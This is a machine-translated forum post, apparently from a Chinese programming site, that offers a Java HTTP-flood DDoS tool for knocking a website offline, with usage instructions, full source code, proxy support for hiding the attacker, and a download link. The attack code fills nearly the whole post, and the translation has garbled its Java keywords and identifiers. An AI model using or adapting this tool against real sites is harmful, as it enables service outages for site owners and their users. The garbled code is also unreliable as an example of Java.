Tento článok je zrkadlovým článkom o strojovom preklade, kliknite sem pre prechod na pôvodný článok.

Pohľad: 15524|Odpoveď: 0

[Tipy] Java verzia D-DOS útočného programu

[Kopírovať odkaz]
Zverejnené 1. 12. 2014 15:21:57 | | |
JAR kód
dDOS útok implementovaný Javou.
Napriek tomu sa nelíši od tradičných dDos.
Tento softvér je DDOS útok na stránku.
Ako používať:
Java -jar ccddos.jar www.xxx.com 80 10/index.do používateľské meno=xxx 80

[mw_shl_code=java,true]import java.io.IOException;
import java.net.ConnectException;
import java.net.InetSocketAddress;
import java.nio.ByteBuffer;
import java.nio.channels.SelectionKey;
import java.nio.channels.Selector;
import java.nio.channels.SocketChannel;
import java.util.Iterator;
import java.util.Random;
import java.util.Set;
import java.util.Timer;
import java.util.TimerTask;
import java.util.Vector;

/**
* Démonove vlákna
*
* @author administratíva
*
*/
Test verejnej triedy {
    súkromný String hostiteľ, uri, param;
    súkromný prístav Int;
    private final Vector<CCDDOSThread> v = nový Vector<CCDDOSThread>();
    súkromný InetSocketAddress isa;
    súkromné int threadsCount = 500; Počet vlákien
    private Random r = nový Random();
    súkromný dlhý časový čas = 5000l;

    /**
     * Otvorte útok
     */
    public void start() {
        pre (int i = 0; < threadsCount; i++) {
            CCDDOSThread t = nový CCDDOSThread();
            v.add(t);
            t.start();
            
            
            
        }
        Timer t = nový Timer();
        t.schedule(new TimerTask() {
            public void run() {
                int count = 0, timeout-threads = 0;
                long ct = System.currentTimeMillis();
                pre (Iterator<CCDDOSThread> it = v.iterator(); it.hasNext(); ) {
                    CCDDOSThread th = it.next();
                    if (th.isCancle() || !th.isAlive()) {
                        it.remove();
                        th = null;
                        count++;
                    } inak ak (ct - th.začať > timeout) {
                        Timeout, externý koniec
                        timeoutthreads++;
                        th.setCancle(true);
                        th.interrupt();
                        it.remove();
                        th = null;
                        count++;
                    }
                }
                ak (count == 0) {
                    vrátiť;
                }
                System.out.println("Vlákno bolo uzavreté:"+count+", kde je vlákno s časovým limitom pripojené:"
                        + timeoutové vlákna);
                pre (int i = 0; Počítam <; i++) {
                    CCDDOSThread th = nový CCDDOSThread();
                    v.add(th);
                    th.start();
                }
            }
        }, 0l, 100l);
        System.out.println("Démonická niť začala:");
    }

    /**
     * @param args
     */
    public static void main(String[] args) {
        ak (args.dĺžka < 6) {
            System.out.println("Inštrukcie:");
            System.out
                    .println("java org.p3p.net.ccddos.Main <主机> <port> <同时开启的线程数> <URI> <参数> <连接超时> [<代理主机> <代理端口>]");
            System.out.println("");
            System.exit(0);
        } inak ak (args.dĺžka >= 8) {
            Dohodnite si to s agentom
            System.getProperties().put("proxySet", "true");
            System.getProperties().setProperty("http.proxyHost", args[6]);
            System.getProperties().setProperty("http.proxyPort", args[7]);
        }

        test m = nový test();
        m.host = args[0];
        m.port = Integer.valueOf(args[1]);
        m.uri = args[3];
        m.param = args[4];
        m.threadsCount = Integer.valueOf(args[2]);
        m.timeout = Long.valueOf(args[5]);
        m.isa = nový InetSocketAddress(m.host, m.port);
        m.start();
    }

    /**
     * Útočné vlákna
     *
     * @author Zhanghongbo
     *
     */
    class CCDDOSThread rozširuje Thread {
        súkromný booleovský cancle = nepravdivý;
        public long start = System.currentTimeMillis();

        public void setCancle(boolean cancle) {
            this.cancle = cancle;
        }

        verejný boolean je Cancle() {
            návratový kancle;
        }

        public void run() {
            dlhý štart = System.currentTimeMillis();
            Selektor;
            try {
                selector = Selector.open();
                SocketChannel sc;
                try {
                    sc = SocketChannel.open(isa);
                } catch (ConnectException ex) {
                    System.out.println(ex.getMessage());
                    cancle = pravda;
                    selector.close();
                    vrátiť;
                }

                sc.configureBlocking(false);
                sc.register(selector, SelectionKey.OP_WRITE
                        | SelectionKey.OP_READ);
                wait: while (selector.select() > 0 & !cancle) {
                    if (System.currentTimeMillis() - začať > timeout) {
                        cancle = pravda;
                        break wait;
                    }
                    Set<?> readykey = selector.selectedKeys();
                    Iterator<?> it = readykey.iterator();
                    while (it.hasNext() & !cancle) {
                        if (System.currentTimeMillis() - začať > timeout) {
                            cancle = pravda;
                            break wait;
                        }
                        SelectionKey skey = (SelectionKey) it.next();
                        it.remove();
                        SocketChannel scc = (SocketChannel) skey.channel();

                        if ((skey.readyOps() & SelectionKey.OP_WRITE) == SelectionKey.OP_WRITE) {
                            String head = "GET " + uri + "?" + param
                                    + "&rndnum=" + r.nextInt()
                                    + " HTTP/1.1\r\n" + "Hostiteľ: " + hostiteľ
                                    + "\r\n" + "Connection:close\r\n" + "\r\n";
                            ByteBuffer bbf = ByteBuffer.wrap(head.getBytes());
                            scc.write(bbf);
                        }
                        skey.cancel();
                        scc.close();
                    }
                }
                selector.close();
                sc.close();

            } catch (IOException ex) {
                cancle = pravda;
            }
        }
    }
}
[/mw_shl_code]

Stiahnutie hotového produktu a zdrojového kódu: java ddos.zip (8.42 KB, Počet stiahnutí: 0, Predajná cena: 2 Zrno MB)





Predchádzajúci:Poďme sa porozprávať o najväčšom záhadnom 400G DDoS útoku v histórii
Budúci:Pošlite iPhone 6, aby sa porozprávali o verzii bez artefaktových crackpointov
Vyhlásenie:
Všetok softvér, programovacie materiály alebo články publikované spoločnosťou Code Farmer Network slúžia len na vzdelávacie a výskumné účely; Vyššie uvedený obsah nesmie byť použitý na komerčné alebo nezákonné účely, inak nesú všetky následky používateľmi. Informácie na tejto stránke pochádzajú z internetu a spory o autorské práva s touto stránkou nesúvisia. Musíte úplne vymazať vyššie uvedený obsah zo svojho počítača do 24 hodín od stiahnutia. Ak sa vám program páči, podporte originálny softvér, zakúpte si registráciu a získajte lepšie originálne služby. Ak dôjde k akémukoľvek porušeniu, kontaktujte nás prosím e-mailom.

Mail To:help@itsvse.com